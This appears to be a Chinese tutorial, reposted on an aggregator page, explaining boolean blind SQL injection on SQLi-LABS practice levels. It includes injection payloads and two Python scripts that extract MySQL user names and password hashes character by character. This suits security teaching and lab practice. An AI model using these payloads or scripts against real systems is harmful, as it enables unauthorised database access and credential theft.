当前位置：首页 > news >正文

Web安全：SQL注入之布尔盲注原理+步骤+实战操作

news 2025/10/18 19:00:09

「作者简介」：2022年北京冬奥会网络安全中国代表队，CSDN Top100，就职奇安信多年，以实战工作为基础对安全知识体系进行总结与归纳，著作适用于快速入门的《网络安全自学教程》，内容涵盖系统安全、信息收集等12个知识域的一百多个知识点，持续更新。

这一章节我们需要知道布尔盲注的原理和使用步骤。

在这里插入图片描述

布尔盲注是SQL注入漏洞的利用方式之一，布尔盲注使用时分为两个步骤：

使用 length()函数判断查询结果的「长度」
使用 substr()函数「截取」每一个字符，并「穷举」出字符内容

布尔盲注

1、原理分析
- 1.1、长度判断原理
- 1.2、穷举字符原理
2、步骤总结
- 2.1、判断注入点
- 2.2、判断长度
- 2.3、枚举字符
3、盲注脚本

1、原理分析

接下来，我们以测试网站（SQLi LABS 第5关）为例，解释一下这两个步骤的详细使用方式和注入的原理。

1.1、长度判断原理

首先，利用MySQL的 length()函数判断返回结果的「长度」是多少。

比如，我们猜database()当前数据库名字的长度是1个字符，在地址栏输入：

?id=1' and length( database() )=1 -- a

执行流程如下：
在这里插入图片描述
页面异常（空）显示，表示猜解长度有误；

页面正常显示，表示猜解长度正确；

依次猜测1，2，3……n，直至长度猜解正确（页面正常显示）。
在这里插入图片描述
如上，测试长度1~7一直异常（空）显示，测试长度8时变为正常显示，就意味着查询结果的长度是8.

1.2、穷举字符原理

查询结果由一个个字符组成，每一个字符有95种可能性（大小写字母、数字、特殊符号），对应的ASCLL编码是32~126。

不了解ASCLL编码的可以看我的另一篇文章：ASCLL编码详解，ASCLL编码对照表

使用MySQL的 substr()函数「截取」查询结果的第一个字符，使用 ascii()函数将截取的字符「转换」成 ASCLL编码，依次判断是否等于32,33,34……126。

页面异常（空）显示，表示猜解失误；

页面正常显示，表示猜解正确；

猜解流程如下：
在这里插入图片描述
ASCLL编码 115 对应的字符是 ‘s’，确定第一个字符是：s

上一步已经确定了长度是 8，依次截取第 1~8个字符，并依次判断每个字符的内容。
在这里插入图片描述

2、步骤总结

页面没有显示位置，没有报错信息，只有登录成功和登录失败这两种情况时，使用布尔盲注。布尔盲注的效率并不高，所以使用优先级排在联合准入、报错注入后面。

2.1、判断注入点

同时满足以下两种情况：

?id=1' and 1 -- a	正常显示
?id=1' and 0 -- a	异常(空)显示

2.2、判断长度

?id=1' and length( 查询语句 )=1 -- a

2.3、枚举字符

?id=1 and ascii(substr( 查询语句 ,1,1))=32 -- a

3、盲注脚本

手工盲注的时间复杂度非常大，通常会使用脚本盲注。

get请求盲注脚本：

import requests# 只需要修改url 和 两个payload即可
# 目标网址（不带参数）
url = "http://3534c6c2bffd4225bf3409ae9a2ec278.app.mituan.zone/Less-5/"
# 猜解长度使用的payload
payload_len = """?id=1' and length((select group_concat(user,password)from mysql.user)) < {n} -- a"""
# 枚举字符使用的payload
payload_str = """?id=1' and ascii(substr((select group_concat(user,password)from mysql.user),{n},1)) = {r} -- a"""# 获取长度
def getLength(url, payload):length = 1  # 初始测试长度为1while True:response = requests.get(url= url+payload_len.format(n= length))# 页面中出现此内容则表示成功if 'You are in...........' in response.text:print('测试长度完成，长度为：', length,)return length;else:print('正在测试长度：',length)length += 1  # 测试长度递增# 获取字符
def getStr(url, payload, length):str = ''  # 初始表名/库名为空# 第一层循环，截取每一个字符for l in range(1, length+1):# 第二层循环，枚举截取字符的每一种可能性for n in range(33, 126):response = requests.get(url= url+payload_str.format(n= l, r= n))# 页面中出现此内容则表示成功if 'You are in...........' in response.text:str+= chr(n)print('第', l, '个字符猜解成功：', str)break;return str;# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)

post请求盲注脚本：

import requests# 网站路径
url = "http://7eb82265178a435aa86d6728e7b1e08a.app.mituan.zone/Less-13/"
# 判断长度的payload
payload_len = """a') or length((select group_concat(user,password) from mysql.user))>{n} -- a"""
# 枚举字符的payload
payload_str = """a') or ascii(substr((select group_concat(user,password)from mysql.user),{l},1))={n} -- a"""# post请求参数
data= {"uname" : "a') or 1 -- a","passwd" : "1","submit" : "Submit"
}# 判断长度
def getLen(payload_len):length = 1while True:# 修改请求参数data["uname"] = payload_len.format(n = length)response = requests.post(url=url, data=data)# 出现此内容为登录成功if '../images/flag.jpg' in response.text:print('正在测试长度：', length)length += 1else:print('测试成功，长度为：', length)return length;# 枚举字符
def getStr(length):str = ''# 从第一个字符开始截取for l in range(1, length+1):# 枚举字符的每一种可能性for n in range(32, 126):data["uname"] = payload_str.format(l=l, n=n)response = requests.post(url=url, data=data)if '../images/flag.jpg' in response.text:str += chr(n)print('第', l, '个字符枚举成功：',str )breaklength = getLen(payload_len)
getStr(length)

Web安全：SQL注入之布尔盲注原理+步骤+实战操作

「作者简介」：2022年北京冬奥会网络安全中国代表队，CSDN Top100，就职奇安信多年，以实战工作为基础对安全知识体系进行总结与归纳，著作适用于快速入门的《网络安全自学教程》，内容涵盖系统安全、信息收集等…...

编程日记 2024/5/13 8:21:24

电商秒杀系统-案例04-redis下的session控制

前言： 在现代的Web应用中，安全和高效的用户身份验证机制是至关重要的。本文将深入探讨基于令牌的用户登录会话机制，特别是在使用Redis进行会话管理的情景。通过这一案例实战，我们将了解令牌如何在用户身份验证过程中发挥核心作用&…...

编程日记 2024/5/13 8:19:22

贪吃蛇（c实现）

目录游戏说明： 第一个是又是封面，第二个为提示信息，第三个是游戏运行界面游戏效果展示： 游戏代码展示： snack.c test.c snack.h 控制台程序的准备： 控制台程序名字修改： 参考&#xff1a…...

编程日记 2024/5/13 8:15:17

【论文阅读笔记】MapReduce: Simplified Data Processing on Large Clusters

文章目录 1 概念2 编程模型3 实现3.1 MapReduce执行流程3.2 master数据结构3.3 容错机制3.3.1 worker故障3.3.2 master故障3.3.3 出现故障时的语义 3.4 存储位置3.5 任务粒度3.6 备用任务 4 扩展技巧4.1 分区函数4.2 顺序保证4.3 Combiner函数4.4 输入和输出的类型4.5 副作用4.…...

编程日记 2024/5/13 8:14:16

LeetCode题练习与总结：二叉树的中序遍历--94

一、题目描述给定一个二叉树的根节点 root ，返回它的中序遍历。示例 1： 输入：root [1,null,2,3] 输出：[1,3,2]示例 2： 输入：root [] 输出：[]示例 3： 输入：roo…...

编程日记 2024/5/13 8:13:14

云计算十三课

centos安装点击左上角文件点击新建虚拟机点击下一步点击稍后安装操作系统，下一步选择Linux（l）下一步设置虚拟机名称点击浏览选择安装位置新建文件夹设置名称不能为中文，点击确定点击下一步设置磁盘大小点击下一步…...

编程日记 2024/5/13 8:12:13

[数据集][目标检测]电力场景安全帽检测数据集VOC+YOLO格式295张2类别

数据集格式：Pascal VOC格式YOLO格式(不包含分割路径的txt文件，仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数)：295 标注数量(xml文件个数)：295 标注数量(txt文件个数)：295 标注类别…...

编程日记 2024/5/13 8:11:11

AtCoder Beginner Contest 308 A题 New Scheme

A题：New Scheme 标签：模拟题意：给定 8 8 8个数的序列，询问这些数是否满足以下条件： 在 100 100 100到 675 675 675之间且能被 25 25 25整除序列是单调非递减的题解：按题意模拟判断就好了。代码&#…...

编程日记 2024/5/13 8:10:10

C++编程与朱元墇的关系

学编程和英语没关系，我说这句话，没人会相信，也不会有人说我什么哗众取宠。我说学编程和朱元墇有关系，一定有人说我放P，其实这个P也和朱元墇有关系， 和朱元墇有什么P关系啊。真有这P事啊， 朱元…...

编程日记 2024/5/13 8:09:09

0060__设计模式

1. 简单工厂模式( Simple Factory Pattern ) — Graphic Design Patterns 工厂模式 | 菜鸟教程【设计模式——学习笔记】23种设计模式——建造者模式Builder（原理讲解应用场景介绍案例介绍Java代码实现）-CSDN博客设计模式—— 五：迪米特…...

编程日记 2024/5/13 8:05:05

【Linux 网络】网络编程套接字 -- 详解

⚪ 预备知识 1、理解源 IP 地址和目的 IP 地址举例理解：（唐僧西天取经） 在 IP 数据包头部中有两个 IP 地址， 分别叫做源 IP 地址和目的 IP 地址。如果我们的台式机或者笔记本没有 IP 地址就无法上网，而因为…...

编程日记 2024/5/13 8:01:01

以OpenResty-1.19.9.1为例编辑openresty-1.19.9.1/build/nginx-1.19.9/auto/lib/openssl/conf CORE_INCS"$CORE_INCS $OPENSSL/.openssl/include" CORE_DEPS"$CORE_DEPS $OPENSSL/.openssl/include/openssl/ssl.h" CORE_LIBS"$CORE_LIBS $OPENSSL/.…...

编程日记 2024/5/13 7:58:57

Amazon Bedrock 托管 Llama 3 8B70B

Amazon Bedrock 托管 Llama 3 8B&70B，先来体验：（*实验环境账号有效期为1天，到期自动关停，请注意重要数据保护） https://dev.amazoncloud.cn/experience/cloudlab?id65fd86c7ca2a0d291be26068&visi…...

编程日记 2024/5/13 7:54:53

海豚调度器早期版本如何新增worker分组

在DolphinScheduler 1.3.5版本中，Worker分组通常是在部署时通过配置文件进行定义的，而不是在用户界面上直接操作。以下是在DolphinScheduler中新增Worker分组的一般步骤： 修改配置文件： DolphinScheduler的Worker分组信息通常在/…...

编程日记 2024/5/13 7:51:49

Debian Linux 下给Nginx 1.26.0 编译增加Brotli算法支持

明月发现参考【给Nginx添加谷歌Brotli压缩算法支持】一文给出的方法，在Debian Linux 12.5下就一直编译失败，主要的错误是因为文件缺失，在专门又安装了apt-get install libbrotli-dev的依赖库后依然会因为文件缺失无法编译完成，就这…...

编程日记 2024/5/13 7:48:46

中国银行从业在线教育系统,如何搭建网课平台？

如今这个时代相信没多少人是没听过网课平台的，绝大多数人对网课平台的名气是如雷贯耳的。时代的发展，让人们学习的方式变得更加的方便与快捷。今天就来和大家说说网课平台搭建都有哪些方法?网课平台难搭建么? 网课平台搭建的方法，其实网课平…...

编程日记 2024/5/13 7:47:43

解决java.lang.IllegalArgumentException异常的正确方法

java.lang.IllegalArgumentException 是 Java 中的一个异常类，表示方法中传递的参数不合法。这个异常通常在方法被调用时抛出，表明方法的参数出现了问题。要正确解决这个异常，你可以按照以下步骤进行： 查看异常信息：首…...

编程日记 2024/5/13 7:46:42

齿轮滚刀刃口钝化技术简介

介绍在滚刀的使用中发现，进口滚刀和国产滚刀在加工质量和寿命方面存在显著差异。经过多次比较得知，滚刀的使用寿命可以达到国产滚刀的两倍以上，而进口滚刀返回原厂磨削后的使用寿命约为新刀具的90% ，但同样经过国内厂家磨削后&a…...

编程日记 2024/5/13 7:44:39

【ESP32接入ATK-MO1218 GPS模块】

【ESP32接入ATK-MO1218 GPS模块】 1. 引言2. ATK-MO1218 GPS模块概述3. 接入ATK-MO1218 GPS模块的步骤4. 示例代码5. 结论1. 引言在现代的嵌入式系统和物联网项目中，精确的位置信息是至关重要的。ATK-MO1218 GPS模块作为一款高性能的GPS/北斗双模定位模块，为开发者提供了强…...

编程日记 2024/5/13 7:39:33

EDA设计学习笔记2：STM32F103C8T6最小系统板的仿绘

今日开始仿制练习一个STM32F103C8T6最小系统板，通过对这个最小系统板的仿制，达到对自己PCB设计的练习的目的，最终目标是自己设计出一块PCB，做一个OLED的桌面小摆件...... 也不知道画出来能不能用..... 目录主控芯片的搜索与放置…...

编程日记 2024/5/13 7:38:32

synchronized 学习

学习源： https://www.bilibili.com/video/BV1aJ411V763?spm_id_from333.788.videopod.episodes&vd_source32e1c41a9370911ab06d12fbc36c4ebc 1.应用场景不超卖，也要考虑性能问题（场景） 2.常见面试问题： sync出…...

编程新知 2025/9/8 2:34:58

RocketMQ延迟消息机制

两种延迟消息 RocketMQ中提供了两种延迟消息机制指定固定的延迟级别通过在Message中设定一个MessageDelayLevel参数，对应18个预设的延迟级别指定时间点的延迟级别通过在Message中设定一个DeliverTimeMS指定一个Long类型表示的具体时间点。到了时间点后&#xf…...

编程新知 2025/10/14 13:22:03

ETLCloud可能遇到的问题有哪些？常见坑位解析

数据集成平台ETLCloud，主要用于支持数据的抽取（Extract）、转换（Transform）和加载（Load）过程。提供了一个简洁直观的界面，以便用户可以在不同的数据源之间轻松地进行数据迁移和转换。…...

编程新知 2025/10/16 10:02:33

自然语言处理——Transformer

自然语言处理——Transformer 自注意力机制多头注意力机制Transformer 虽然循环神经网络可以对具有序列特性的数据非常有效，它能挖掘数据中的时序信息以及语义信息，但是它有一个很大的缺陷——很难并行化。我们可以考虑用CNN来替代RNN，但是…...

编程新知 2025/10/12 4:16:21

python报错No module named ‘tensorflow.keras‘

是由于不同版本的tensorflow下的keras所在的路径不同，结合所安装的tensorflow的目录结构修改from语句即可。原语句： from tensorflow.keras.layers import Conv1D, MaxPooling1D, LSTM, Dense 修改后： from tensorflow.python.keras.lay…...

编程新知 2025/9/24 7:39:50

2025季度云服务器排行榜

在全球云服务器市场，各厂商的排名和地位并非一成不变，而是由其独特的优势、战略布局和市场适应性共同决定的。以下是根据2025年市场趋势，对主要云服务器厂商在排行榜中占据重要位置的原因和优势进行深度分析： 一、全球“三巨头”…...

编程新知 2025/9/28 3:34:15

Rust 开发环境搭建

环境搭建 1、开发工具RustRover 或者vs code 2、Cygwin64 安装 https://cygwin.com/install.html 在工具终端执行： rustup toolchain install stable-x86_64-pc-windows-gnu rustup default stable-x86_64-pc-windows-gnu 2、Hello World fn main() { println…...

编程新知 2025/10/12 18:37:27

Modbus RTU与Modbus TCP详解指南

目录 1. Modbus协议基础 1.1 什么是Modbus？ 1.2 Modbus协议历史 1.3 Modbus协议族 1.4 Modbus通信模型 🎭 主从架构 🔄 请求响应模式 2. Modbus RTU详解 2.1 RTU是什么？ 2.2 RTU物理层 🔌 连接方式 ⚡ 通信参数 2.3 RTU数据帧格式 📦 帧结构详解 🔍…...

编程新知 2025/9/10 17:50:53